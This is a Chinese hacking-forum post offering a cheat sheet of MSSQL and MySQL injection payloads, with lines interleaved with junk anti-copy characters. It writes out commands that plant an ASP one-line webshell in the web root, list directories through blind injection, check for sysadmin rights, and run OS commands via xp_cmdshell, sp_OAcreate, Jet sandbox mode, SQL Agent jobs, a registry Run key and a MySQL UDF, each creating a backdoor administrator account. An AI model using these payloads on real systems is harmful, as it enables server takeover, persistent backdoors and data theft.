找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2788|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
# ?( w; U0 [: g3 g& k首先确定网站的WEB路径
$ N! J( Z' w& \+ R8 W$ j1 _' g;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马; p2 w! a) ~/ D. ?3 O
9 A& T2 Y/ n! A% X
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
3 f# q3 t! w3 G3 U//将一句话木马插入表中% w& M  k* I# D8 U1 [3 D5 s  W
4 @) o6 y/ i- c3 H! N
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 4 E. ?/ d- }/ E" N- j
//导出一个ASP文件2 V: q( w/ o! R1 X- [

  t5 l# N8 M4 M& i& o& p9 ]" ~) k, x; p2 n6 A
关于MSSQL列目录
3 |1 J1 N/ u# s5 Z- t/ ~- p' I;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表" X# X( Q9 E7 ]. o
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表# ]* Q! T6 g0 \, r

( R4 I1 N8 N, t; G, iand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录6 {, \: K2 z( C# O  U+ J* b1 o
5 Z* H' b) \' j! q
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
- E7 b* \  F9 s8 ^) ]4 u% K* \" b9 \+ D6 @
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符, g2 `# ^& Q4 T4 ~7 l3 W+ ?
  z; b; T) C, {5 E
: k. M5 \$ K& @* }
数据库版本和权限查看
9 S( p- b4 Z. p9 a- v5 ^and 1=(select @@VERSION) //查看详细的数据库信息., f9 U5 x, Z& A0 H, M9 ^! e. m
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
4 V3 g) l$ s9 K3 ?" Q$ nand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
) |+ ~6 T( o# a; Y
3 ]: e6 i8 K" i8 ^3 v& }
$ r4 i0 n  x9 c. Y; n1.利用xp_cmdshell执行命令
6 C2 R# }5 {8 yexec master..xp_cmdshell 'net user rfire 123456 /add'3 |; U" \; w: U3 Z! x8 N1 f5 n
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
4 w0 i7 E+ h) C& h' g8 ?: C, z1 l1 |) D# |8 s
恢复xp_cmdshell存储过程: C4 l( E8 ^0 m# O* x$ ]& D
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
- N0 g; Z0 O: }2 s7 B/ m' {7 c, S. t7 y4 G2 t+ p5 T
3 M* ^  p$ C, l
2.利用SP_OAcreate和SP_OAMETHOD执行命令
3 f4 z+ a3 a+ m在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下8 {+ K* S5 L( `
DECLARE @shell INT //建立一个@shell实体% Z6 r( m9 L5 A' j4 I
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例- y& R4 U6 `7 {% m1 [
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例5 d! v! A6 B- f# K; o  t

, j3 x, U$ |/ Y7 z2 _1 a/ N1 k
6 U9 N2 U/ v! B1 `3.利用沙盒模式: j% a; S6 }7 G  j& [( g
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
" t8 g7 a6 }# D( r: n- x开启沙盒模式:
( f7 h& H5 H1 o: n' rEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
# P: g: }1 J. \6 P1 C- W- x# n3 _! n7 d9 R* I% c
执行命令:
% b3 m% v5 b; K4 B# SSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
' F+ T/ c* b; U8 r
5 u. Q/ T; `# L
0 T2 {, A9 R9 d- r- z  A4.利用SQL代理执行命令
. X3 A9 j6 X. ]EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务  |& x2 T) Y: T
" e& `$ N3 X: h9 d) X5 J
执行命令:  r# _5 ~! \4 K4 V
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
) l! G1 m) T3 j' Dexec sp_add_job 'x'- d. |% a/ F9 ^" d
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业+ T+ L5 D9 G5 V  n7 I6 A1 X) ]& m! ~
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
" [! W* K, W+ d5 R! `" G
9 z% F: q% v: h6 I, a: W# o$ O, F3 w; r5 K
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
$ f1 ?9 ~9 b6 f9 M9 b+ VEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
& }  u4 s* O3 S$ K$ g6 f3 R. r$ `) d$ y; j
7 w. l/ q/ P* s  ^& N  t0 C( q* ^
6.MYSQL的命令执行9 Q+ Y3 u  N) l1 @/ Y/ c- m
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)+ z: N3 s/ u- A) V) r% z2 f
首先要在su.php下导出c:\windows\udf.dll
& }( v- l! O, u' \* D& T' U导出后执行创建自定义函数命令:2 D0 p, h  ?  ]5 C1 W! _7 ~
Create Function cmdshell returns string soname 'udf.dll'
1 X! m% n( b$ \9 W& J执行命令. c4 M' Z/ H  O- e* i" j
select cmdshell('net user rfire 123456 /add')
& ~5 F; F; M% i9 _4 U. K执行后删除函数 drop function cmdshell
7 t+ K  ~+ Q' ?+ b, G# C* a0 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表